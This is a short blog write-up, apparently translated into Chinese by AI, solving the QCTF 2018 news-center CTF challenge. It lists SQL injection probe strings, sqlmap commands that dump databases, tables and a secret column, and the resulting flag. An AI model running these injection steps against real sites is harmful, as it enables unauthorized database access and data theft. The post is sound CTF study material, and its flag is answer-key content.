肥皂的小屋

QCTF-2018-新聞中心-解題報告

2019年1月6日#CTF #CTF writeup120

AI 翻譯

這篇文章透過AI由英文翻譯成繁體中文。查看原文

AI 生成的摘要

這篇文章是關於一個CTF題目的解題過程。文章描述了作者在一個CTF訓練平台上遇到的一個題目，該題目是一個搜索界面，作者嘗試注入攻擊但沒有成功。然後作者使用Burp Suite進行包分析，發現是使用POST方法發送請求。作者將請求保存為1.txt文件，並使用sqlmap工具對其進行注入攻擊。最終，作者成功獲得了flag：QCTF{sq1_inJec7ion_ezzz}。

為什麼要寫已經結束很久的題的 writeup：因為在做某 CTF 訓練平台的題

首先打開網站，是一個搜索界面，隨便搜索下，好像沒什麼反應：

試試有沒有注入：

a'：空白界面
a and 1=1：沒返回內容
a and 1=1 and '%'='%：沒返回內容

好像沒啥可注入的，那看下包吧，上 burp，發現是 post 發包：

那麼存為 1.txt，用 sqlmap 跑：
python sqlmap.py -r 1.txt -p search --dbs

python sqlmap.py -r 1.txt -p search -D news --tables

python sqlmap.py -r 1.txt -p search -D news -T secret_table --columns

python sqlmap.py -r 1.txt -p search -D news -T secret_table -C "fl4g,id" --dump

得到 flag：QCTF{sq1_inJec7ion_ezzz}

此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。

區塊鏈編號
#58006-76
擁有者
0xa75bc050d20393dc83b0a7bba2974521594cb660
交易雜湊值
創作 0xee10553a...48c26d81de 最後更新 0xee10553a...48c26d81de
IPFS 位址
ipfs://bafkreictwzt5rshdt7svl47bus7zwrlhaxv7d64oxvxy6xnkjyykok7d3i